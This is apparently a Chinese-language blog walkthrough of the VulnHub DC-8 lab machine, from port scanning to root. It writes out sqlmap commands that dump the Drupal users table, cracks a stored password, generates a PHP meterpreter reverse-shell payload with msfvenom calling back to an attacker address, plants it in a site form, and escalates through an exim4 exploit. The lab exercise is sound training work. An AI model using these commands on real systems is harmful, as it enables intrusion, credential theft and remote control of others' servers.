当前位置:网站首页>vulnhub之dc8
vulnhub之dc8
2022-06-26 21:45:00 【天下 (天衍师)】
各位小伙伴,可直接看这位师傅
https://blog.csdn.net/weixin_44288604/article/details/122944302
个人写的很粗糙
DC8本身的难度较低,可以较为轻松地获取到目标权限,总体思路
主机发现,端口扫描——挖掘服务漏洞——获取后台权限——上传shell——提权
主机发现,端口扫描,服务探测

一共开启2个端口,80和22端口,80端口开放的服务为drupal 7,打开界面进行检测,这里利用burpsuit联合xray进行检测
burpsuit的user option操作栏中设置自己闲置代理,运行xray即可,如下图所示
这里使用bp自带的浏览器进行测试,然后在界面进行点击,每一个功能点都要点击下
点击到 http://192.168.43.142/?nid=3该界面时候,xray检测到存在sql注入,直接上sqlmap
发现存在两个数据库,d7db,information_schema,这里选择第一个d7db,查看表名
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db --tables
在众多的表里面选择users表,直接下载
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db -T users --dump
发现存在两个用户,admin和john,但密码为加密之后的数据,尝试进行暴力破解,将这两个密文做成字典,使用john进行暴力破解,爆破出来其中john的密码为turtle,登录后台,查看能够上传shell的位置,这里建议使用谷歌浏览器,别问,问就是能够右键翻译
在这个界面中,可以定义输入表单之后的界面,这里采用msf生成php木马反弹,已经生成过了,不进行展示
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=8888 -f raw > shell.php
打开该文件,将文件复制到上图位置,选择PHP code,并保存,然后在对应的表单提交复核格式的数据,即可接受到会话
python交互式shell,查找有sudo权限执行的文件
find / -perm -u=s -type f 2>/dev/null
发现存在exim4为sudo权限,查看版本,查找对应exp
exp大法,这里下载第二个,然后复制到攻击机上面,使用python开启http服务,目标机下载运行

获得root权限
边栏推荐
- Web crawler 2: crawl the user ID and home page address of Netease cloud music reviews
- 矩阵求导及其链式法则
- DAST 黑盒漏洞扫描器 第五篇:漏洞扫描引擎与服务能力
- The latest 2022 research review of "continuous learning, CL"
- Shiniman household sprint A shares: annual revenue of nearly 1.2 billion red star Macalline and incredibly home are shareholders
- 线性模型LN、单神经网络SNN、深度神经网络DNN与CNN测试对比
- DLA模型(分类模型+改进版分割模型) + 可变形卷积
- The importance of using fonts correctly in DataWindow
- 在Flutter中解析复杂的JSON
- Matrix derivation and its chain rule
猜你喜欢

Netease Yunxin officially joined the smart hospital branch of China Medical Equipment Association to accelerate the construction of smart hospitals across the country

VB.net类库(进阶——2 重载)

DLA模型(分类模型+改进版分割模型) + 可变形卷积

Listing of maolaiguang discipline on the Innovation Board: it is planned to raise 400million yuan. Fanyi and fanhao brothers are the actual controllers

Y48. Chapter III kubernetes from introduction to mastery -- pod status and probe (21)

In 2022, where will the medium and light-weight games go?

Convolutional neural network (CNN) explanation and tensorflow2 code implementation

Cause analysis of 12 MySQL slow queries

y48.第三章 Kubernetes从入门到精通 -- Pod的状态和探针(二一)

VB.net类库(进阶版——1)
随机推荐
MATLAB与Mysql数据库连接并数据交换(基于ODBC)
The latest 2022 research review of "continuous learning, CL"
模块五作业
What are the accounting elements
在哪家券商公司开户最方便最安全可靠
协同过滤进化版本NeuralCF及tensorflow2实现
2022年,中轻度游戏出海路在何方?
DAST black box vulnerability scanner part 5: vulnerability scanning engine and service capability
Test comparison of linear model LN, single neural network SNN, deep neural network DNN and CNN
Common concurrent testing tools and pressure testing methods
random_normal_initializer 使用
VB.net类库(进阶——2 重载)
y48.第三章 Kubernetes从入门到精通 -- Pod的状态和探针(二一)
Student information management system based on SSH Framework
YuMinHong: New Oriental does not have a reversal of falling and turning over, destroying and rising again
numpy中mgrid的用法
About appium trample pit: encountered internal error running command: error: cannot verify the signature of (solved)
Vi/vim editor
大龄程序员的一些出路
Introduction of classic wide & deep model and implementation of tensorflow 2 code